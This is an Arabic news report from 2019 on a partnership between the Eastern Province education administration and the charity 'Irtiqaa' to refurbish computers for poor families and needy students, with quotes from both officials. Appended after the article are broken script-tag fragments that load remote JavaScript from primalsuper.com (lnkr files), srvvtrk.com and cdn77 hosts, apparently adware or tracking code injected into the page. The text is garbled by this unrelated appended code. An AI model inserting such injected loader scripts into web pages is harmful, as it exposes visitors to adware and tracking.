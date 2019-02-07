شكرا لقرائتكم خبر عن تأهيل «الحواسيب» للأسر الفقيرة والطلبة المعوزين والان نبدء بالتفاصيل

وقّعت الإدارة العامة للتعليم بالمنطقة الشرقية في مقرها الرئيس بالدمام أمس مذكرة شراكة إستراتيجية مع الجمعية الخيرية لتأهيل الحاسبات الآلية «ارتقاء» تستهدف دعم برامج الرقي الفكري وحماية البيئة من خلال إعادة تأهيل الحواسيب الآلية وتجهيزها للمستخدم من الأسر الفقيرة والطلبة المعوزين، وصولاً لإتاحة المجال أمام الجمعية للتعريف ببرامجها في المدارس ومرافق التعليم، وغيرها من الأنشطة التي تعزز التكامل بين الطرفين بما يخدم الأهداف المشتركة وتعزيز إدراك أهمية المسؤولية الاجتماعية من خلال الخدمات التعليمية المقدمة.

وأوضح مدير تعليم الشرقية د. ناصر الشلعان، عقب توقيع المذكرة، حرص الإدارة على تفعيل الحراك المجتمعي عبر عقد الشراكات مع القطاعات، التي تترك لها بصمة في دفع عجلة التعليم في مختلف المجالات والبرامج الهادفة باعتبار التعليم مسؤولية الجميع، لافتاً في الوقت نفسه إلى أن توقيع هذه الاتفاقية تشرع إدارته بتعزيز الشراكة المجتمعية مع مختلف مؤسسات المجتمع بما يعود بالنفع على أطراف العملية التعليمية بدءا من المدرسة وانتهاءً بالمنزل، مشيداً بجهود القطاع غير الربحي في سبيل دعم العملية التعليمية، ومنها الجمعية الخيرية لتأهيل الحاسبات الآلية «ارتقاء»، في خدمة حماية البيئة من خلال إعادة تأهيل الحواسيب الآلية وتجهيزها للمستفيدين.

وقال المدير التنفيذي للجمعية د. صالح القوم، إن الاتفاقية تأتي في إطار خطط الجمعية الإستراتيجية بين القطاع الخيري وقطاع التعليم، معبراً عن شكره لتعليم الشرقية على التواصل مع مؤسسات القطاع غير الربحي، ودعم العملية التعليمية بشراكات مجتمعية تضيف الكثير لأطراف الشراكة. ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_669827321&key=1fd3b038f796d0b159&cv=1549460408&t=1549460407995" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_148285307&key=1fd3b038f796d0b159&cv=10003&t=1549460407996" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549460408002" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********